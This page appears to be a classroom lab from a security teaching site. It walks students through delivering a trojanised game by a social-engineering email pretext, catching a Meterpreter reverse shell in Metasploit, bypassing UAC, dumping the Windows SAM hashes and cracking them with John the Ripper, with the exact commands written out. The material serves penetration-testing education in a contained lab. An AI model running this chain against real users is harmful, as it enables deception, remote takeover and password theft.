ComputerSecurityStudent (CSS) [Login] [Join Now]

|SECURITY TOOLS >> Trojan Horse Creation >> Current Page |Views: 15169

(Trojan Horse 2: Lesson 3)

{ Social Engineered Trojan Horse sends Request Back to Metasploit }

Section 0. Background Information
  • Pre-Requisite Labs


  • Overview
    • This is the final piece of the exploit, where the unsuspecting user receives an email with a web link saying "Merry Christmas,,, I have this great snowball fight game for you to play."
    • The Victim Clicks on the link, unzips and clicks on the Trojan Horse we previously built.
    • Once activated, the msfpayload sends a request back to the BackTrack server running a Metasploit listener.
    • We will use Metasploit post/windows/escalate/bypassuac to retrieve the SAM password hash, and use John the Ripper to crack the password.


  • Caveats
    • Your BackTrack server either (1) needs to be on the same subnet as the victim host OR (2) the BackTrack server should have a public internet address with port 4444 opened up on your firewall/router that points to your BackTrack server.


  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.


Section 1. Start Up BackTrack5R1
  1. Start Up BackTrack5R1.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine


  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.


  3. Bring up the GNOME
    • Instructions:
      1. Type startx


  4. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window


  5. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • My IP address  In your case, it will probably be different.
      • You will later use this IP Address when give the prospective Victim the web link to the Trojan Horse Game.


  • Section 2. Start Up BackTrack Apache Web Server


    1. Check if Apache Web Server is Running
      • Instructions:
        1. ps -eaf | grep apache | grep -v grep | wc -l
          • "0" was returned because the Apache Web Server is not running.
        2. /etc/init.d/apache2 start
          • This is the Apache Web Server start up script.
        3. ps -eaf | grep apache
      • Notes:
        • Apache2 comes standard with BackTrack5R1.
        • If your version of BackTrack5R1 does not come with Apache, then do the following:
          1. dpkg --get-selections | grep apache2
            • If you do not see apache2 as installed, then continue to the next step..
          2. apt-get install apache2


    Section 3. Start up Metasploit


    1. Start Up Metasploit msfconsole
      • Instructions:
        1. Applications --> msfconsole --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
      • Note:
        • Metasploit takes about 5 to 20 seconds to start up


    2. Start Exploit listener
      • Instructions:
        1. use exploit/multi/handler
        2. set PAYLOAD windows/meterpreter/reverse_tcp
        3. set LHOST
        4. set LPORT 4444
        5. exploit
        6. Continue to the next section!!!

    Section 4. Start Up Windows Machine


    1. Booting up W7P32B
      • Instructions:
        1. Start up VMware Player
        2. Select W7P32B
        3. Play Virtual Machine
      • Note:
        • For those of you that are not part of my class, W7P32Bis a Windows 7 32 Bit Operating System.
        • Any version of Windows can be used.
        • But you must have first completed the pre-requisite labs listed in the overview section.


    2. W7P32B Authentication
      • Instructions:
        1. Login as student


    Section 5. Start up Internet Explorer


    1. Change "student" Password (Part 1)
      • Instructions:
        1. Type in the search box "change password"
        2. Click on "Change your Windows password"


    2. Change "student" Password (Part 2)
      • Instructions:
        1. Click on student
        2. Click on change your password


    3. Change "student" Password (Part 3)
      • Instructions:
        1. Supply the Old Password
        2. Supply the New Password. 
          • Use "student" as your password at the expense of crack time.
        3. Provide a Hint if you want
        4. Click the Change password button



    Section 6. Start up Internet Explorer


    1. Start Up Internet Explorer
      • Instructions:
        1. In the search box type "Internet Explorer"
        2. Under Programs, click on Internet Explorer


    2. Social Engineer Game
      • Instructions:
        1. Pretending,,, you could simulate receiving an email with a link pointing to the Trojan Horse game.
        2. In the Windows Internet Explorer address window put in the following address:
          • Note: Replace with the IP Address obtained from Section 1, Step 5.
        3. Press Enter
      • .


    3. File Download
      • Instructions:
        1. Click Save



    4. Save File
      • Instructions:
        1. The default download location should be as follows
          •  C:\Users\student\Downloads.
        2. File name is snowcraft2
        3. Click Save


    5. Open Folder
      • Instructions:
        1. Click on Open Folder


    6. Extract Zip File
      • Instructions:
        1. Right Click on snowcraft
        2. Select Extract All...


    7. Select a Destination and Extract Files
      • Instructions:
        1. Take the Default location
        2. Click on Extract


    8. Play Game
      • Instructions:
        1. Double Click on the snowcraft2 game


    9. Run Game
      • Instructions:
        1. Click on the Run Button.
        2. Continue to the next Section.


    Section 7. Its Metasploit Time


    1. View Metasploit Session
      • Note:
        1. Notice a stage was sent to the Windows Machine ( over port 4444.
        2. This method is more elegant than Trojan Horse Lesson 1, because the game calls home, instead of trying watching web server logs for IP Addresss.


    2. Obtain Username and System Information
      • Instructions:
        1. getuid
        2. sysinfo


    3. Put Metasploit Session into the Background
      • Instructions:
        1. Press the <Ctrl> Key and the "z" key at the same time.
        2. Answer "y"


    4. Let's Bypass User Authentication Credentials
      • Instructions:
        1. use post/windows/escalate/bypassuac
        2. show options
        3. set LHOST
        4. set SESSION 1
        5. run
        6. Once you see "[*] New server process: notepad.exe", Press <Enter> to get a prompt.


    5. Set Options, Launch Exploit
      • Instructions:
        1. sessions
          • Display all the current metasploit sessions.
        2. sessions -i 2
          • Use the post/windows/escalate/bypassuac session.
        3. getuid
        4. getsystem


    6. View Windows Process List and Get the PID for winlogon.exe
      • Instructions:
        1. ps
        2. Search for winlogin.exe and record the PID.
          • In my case, the PID is 448.
          • Your PID will probably be different.


    7. Migrate and Grab the SAM Database
      • Instructions:
        1. migrate 448
          • Remember this is the PID for winlogon.exe on my machine.
          • It will be different in your case.
        2. run hashdump
      • Note:
        • Now you have the entire Windows SAM Database to Crack


    8. Copy the SAM Database
      • Instructions:
        1. Highlight the SAM Database.
        2. Edit --> Copy


    9. Start up a terminal window
      • Instructions:
        1. Click on the Terminal Window


    10. Saving the SAM Database (Part 1)
      • Instructions:
        1. cd /home/student
        2. vi SAM.txt


    11. Saving the SAM Database (Part 2)
      • Instructions:
        1. Press "i" to get into insert mode.
        2. Edit --> Paste
        3. Press the <Esc> key.
        4. Type ":wq" to write and quit


    12. Filter out the student password
      • Instructions:
        1. cd /home/student
        2. grep student SAM.txt > SAM.student.txt
        3. cat SAM.student.txt


    13. Let's Crack the Password with John the Ripper
      • Instructions:
        1. cd /pentest/passwords/john
        2. ./john --format=NT /home/student/SAM.student.txt
      • Note:
        • Since you used an easy password, John the Ripper was able to figure it out in a hurry.


    Section 8. Proof of Lab


    1. Proof of Lab
      • Instructions:
        1. netstat -ano | grep 4444
        2. cd /home/student
        3. ls -l SAM.txt
        4. date
        5. echo "Your Name"
          • Replace the string "Your Name" with your actual name.
          • E.g., echo "John Gray"
      • Proof of Lab Instructions:
        1. Do a PrtScn
        2. Paste into a Word Document
        3. Upload to Moodle



  • Help ComputerSecurityStudent
    pay for continued research,
    resources & bandwidth